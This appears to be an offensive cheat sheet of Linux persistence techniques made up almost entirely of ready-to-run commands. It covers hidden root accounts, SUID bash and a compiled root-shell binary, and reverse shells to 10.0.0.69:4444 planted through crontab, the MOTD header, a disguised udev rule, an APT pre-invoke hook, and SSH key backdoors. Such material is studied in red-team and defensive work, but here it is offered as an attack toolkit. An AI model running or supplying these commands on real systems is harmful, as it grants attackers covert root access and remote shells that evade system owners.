Linux Persistence

Account Creation

# Add root user
sudo useradd -ou 0 -g 0 kage
sudo passwd kage
echo "kage" | passwd --stdin kage

# Add SUDO user
sudo adduser kage
sudo usermod -aG sudo

SUID

Set shell to SUID

chmod +s /bin/bash
/bin/bash -p # get priv shell

Custom SUID binary

TMPDIR2="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/notevil.c
gcc $TMPDIR2/notevil.c -o $TMPDIR2/notevil 2>/dev/null
rm $TMPDIR2/notevil.c
chown root:root $TMPDIR2/notevil
chmod 4777 $TMPDIR2/notevil # or just chmod +x 

Crontab

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed

# Time spec "nicknames"
@reboot    :    Run once after reboot.
@yearly    :    Run once a year, ie.  "0 0 1 1 *".
@annually  :    Run once a year, ie.  "0 0 1 1 *".
@monthly   :    Run once a month, ie. "0 0 1 * *".
@weekly    :    Run once a week, ie.  "0 0 * * 0".
@daily     :    Run once a day, ie.   "0 0 * * *".
@hourly    :    Run once an hour, ie. "0 * * * *".

# Use `crontab` for specific users
# Write to /etc/crontab for system wide - need to specify user-name. 

# On Reboot
(crontab -l ; echo "@reboot sleep 20 && bash -i >& /dev/tcp/10.0.0.69/4444 0>&1")|crontab 2> /dev/null

# Every 1 minute
(crontab -l ; echo "* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.69/4444 0>&1'")|crontab 2> /dev/null

# Other times
* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.69/4444 0>&1' # Every minute
*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.69/4444 0>&1' # Every 5 minute

Message of the Day (MOTD)

Debian-based (Ubuntu, etc…):
/etc/update-motd.d/00-header

echo 'bash -c "bash -i >& /dev/tcp/10.0.0.69/4444 0>&1"' >> /etc/update-motd.d/00-header

Everyone else:
/etc/profile.d/motd.sh

Driver Backdoor

$RSHELL = "bash -i >& /dev/tcp/10.0.0.69/4444 0>&1"
echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null

APT Backdoor

If you can create a file on the apt.conf.d directory with: APT::Update::Pre-Invoke {"CMD"}; Next time apt-get update is done, your CMD will be executed!

echo 'APT::Update::Pre-Invoke {"nohup bash -c '\''bash -i >& /dev/tcp/10.0.0.69/4444 0>&1'\'' &"};' > /etc/apt/apt.conf.d/69notabackdoor

SSH Backdoor

Add key into ~/.ssh folder

1. ssh-keygen
2. write id_rsa.pub into ~/.ssh/authorized_keys
3. set the right permission, 700 for ~/.ssh, 600 for authorized_keys, and 600 for id_rsa